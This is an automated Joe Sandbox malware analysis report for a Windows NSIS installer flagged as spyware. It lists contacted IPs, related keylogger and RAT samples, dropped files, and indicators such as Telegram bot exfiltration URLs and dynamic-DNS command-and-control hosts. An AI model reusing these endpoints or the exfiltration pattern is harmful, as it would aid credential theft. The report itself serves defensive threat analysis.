https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	87h216Snb7.exe, 87h216Snb7.exe.7.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 0000000B.00000002.2529814283.0000000020C44000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020C75000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enx	msiexec.exe, 0000000B.00000002.2529814283.0000000020C35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/DU	msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/x	msiexec.exe, 0000000B.00000002.2529814283.0000000020C66000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000007.00000002.1531343909.0000000004731000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a	msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 0000000B.00000002.2529814283.0000000020C3F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 0000000B.00000002.2529814283.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 0000000B.00000002.2529814283.0000000020B6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.1531343909.0000000004731000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.217.19.174	drive.google.com	United States	15169	GOOGLEUS	false
142.250.181.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576727
Start date and time:	2024-12-17 13:20:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	87h216Snb7.exe renamed because original name is a hash value
Original Sample Name:	a3f7477a9612f8ac90866fb2c4adc56a447f4a8262e4ac75bb1c825a254afbac.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/16@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 146 Number of non-executed functions: 58
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7304 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4552 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 87h216Snb7.exe

Simulations

Behavior and APIs

Time	Type	Description
07:21:05	API Interceptor	38x Sleep call for process: powershell.exe modified
08:59:16	API Interceptor	157932x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order129845.exe	Get hash	malicious	AgentTesla	Browse
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse
104.21.67.152	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse
193.122.130.0	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	checkip.dyndns.org/
	AsyncClient.exe	Get hash	malicious	AsyncRAT, HVNC, PureLog Stealer	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
api.telegram.org	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	69633f.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	https://www.cadbury.com@nmlr.xyz/christmas-hamper	Get hash	malicious	Unknown	Browse	104.26.9.83
	Doc_23-03-27.js	Get hash	malicious	Unknown	Browse	104.21.32.1
	Doc_23-03-27.js	Get hash	malicious	Unknown	Browse	104.21.80.1
	c2.exe	Get hash	malicious	Xmrig	Browse	104.20.4.235
	23d5f89e-2c54-ee19-3778-06a4bec842b9.eml	Get hash	malicious	Unknown	Browse	104.18.65.57
	https://protect.checkpoint.com/v2/r01/___https://link.edgepilot.com/xdg~fiaa57dVgx2DluRTp19jF8WMmYfWl?z=myyux:ddjrfnq.ynintwjuqD.htrdhdjOBhER6ylHFZFTGu9JoBlVNMIw79G-bMOgKn5Sf55EkuFm_s/LOKQ2pPEoswuEsuU2A7WKVctU0F0LxRir4fJPhZrPOzTgvHZltxJFSX/jFwCJW7F4BtO0gjUt6gM8NiU9g~uEaD_oE2wiDMlq2GDu8zhwYySQbzr0kVZGcn8s4Dk7cEDvSl6XRkaXaP7a5RqmSqgUx7-yk6g8/s-FxFFU__PNlcuV___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmRkMGI4MjA2MTNmMjg1YzMyNTM2YjE2YzI0MjAzMGU1Ojc6MzQ1NjphZDU1ODAwMDRlN2FjYWY0Nzk3ODJmN2U3MjI1MmNkMTUyZWIyNWZlZjgyYTY4N2M3ZWVjN2E0NjVmZjU3M2E4Omg6VDpU	Get hash	malicious	Unknown	Browse	104.16.123.96
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	172.67.129.27
	122046760.bat	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
ORACLE-BMC-31898US	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	https://machino.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	152.67.3.57
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ldr.ps1	Get hash	malicious	GO Miner, Xmrig	Browse	147.154.227.160
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	end.exe	Get hash	malicious	Unknown	Browse	130.61.86.87

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	174 Power Global_Enrollment_.docx.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	mjjt5kTb4o.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	122046760.bat	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	IIC0XbKFjS.lnk	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	uEhN67huiV.dll	Get hash	malicious	Unknown	Browse	149.154.167.220
	JkICQ13OOY.dll	Get hash	malicious	Unknown	Browse	149.154.167.220
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.97 172.217.19.174
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	142.250.181.97 172.217.19.174
	Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174
	sEOELQpFOB.lnk	Get hash	malicious	RedLine	Browse	142.250.181.97 172.217.19.174
	ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	142.250.181.97 172.217.19.174
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.97 172.217.19.174
	bxAoaISZJQ.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174
	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174
	Assinar_PDF_3476.lNK.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aocm4cm.ztm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fy4nunoa.0lz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g02d5kz1.isf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iahkyl0s.ms1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	924744
Entropy (8bit):	7.649692893120675
Encrypted:	false
